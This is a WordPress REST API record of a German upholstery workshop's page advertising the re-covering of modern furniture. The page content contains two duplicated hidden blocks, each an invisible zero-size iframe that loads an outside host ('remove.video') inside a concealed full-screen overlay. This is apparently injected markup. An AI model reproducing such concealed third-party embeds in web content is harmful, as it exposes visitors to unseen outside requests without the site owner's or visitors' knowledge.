{"id":73,"date":"2020-12-16T16:04:57","date_gmt":"2020-12-16T15:04:57","guid":{"rendered":"http:\/\/lampasundseide.de\/WP-Website\/?page_id=73"},"modified":"2023-06-08T12:05:06","modified_gmt":"2023-06-08T10:05:06","slug":"modernes-polstern","status":"publish","type":"page","link":"http:\/\/lampasundseide.de\/WP-Website\/modernes-polstern\/","title":{"rendered":"Modernes Polstern"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"73\" class=\"elementor elementor-73\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-8d716f6 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"8d716f6\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-82e1dc0\" data-id=\"82e1dc0\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4b3b2c3 elementor-widget elementor-widget-text-editor\" data-id=\"4b3b2c3\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Wir beziehen und reparieren Ihre modernen und neuzeitlichen M\u00f6bel.<br \/>Ein 50er-Jahre-Sesselchen ebenso wie Ihre gem\u00fctliche Wohnlandschaft.<\/p><p>Dabei wenden wir die zeittypischen Arbeitstechniken an:<\/p><ul><li>Erneuern der Schaumstoffe und F\u00fcllstoffe<\/li><li>Beziehen mit einem Stoff oder Leder ihrer Wahl<\/li><\/ul><p>Schauen sie sich einige Beispiele aus unserer Werkstatt an.\u00a0 \u2013 <a href=\"http:\/\/lampasundseide.de\/WP-Website\/modernes-polstern-aus-unserer-werkstatt\/\"><span style=\"color: #993366;\"><strong>Hier klicken!<\/strong><\/span><\/a><\/p><div><div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div><\/div><div><div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Wir beziehen und reparieren Ihre modernen und neuzeitlichen M\u00f6bel.Ein 50er-Jahre-Sesselchen ebenso wie Ihre gem\u00fctliche Wohnlandschaft. Dabei wenden wir die zeittypischen Arbeitstechniken an: Erneuern der Schaumstoffe und F\u00fcllstoffe Beziehen mit einem Stoff oder Leder ihrer Wahl Schauen sie sich einige Beispiele aus unserer Werkstatt an.\u00a0 \u2013 Hier klicken!<\/p>\n","protected":false},"author":1,"featured_media":11,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-73","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/pages\/73","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/comments?post=73"}],"version-history":[{"count":19,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/pages\/73\/revisions"}],"predecessor-version":[{"id":308,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/pages\/73\/revisions\/308"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/media\/11"}],"wp:attachment":[{"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/media?parent=73"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}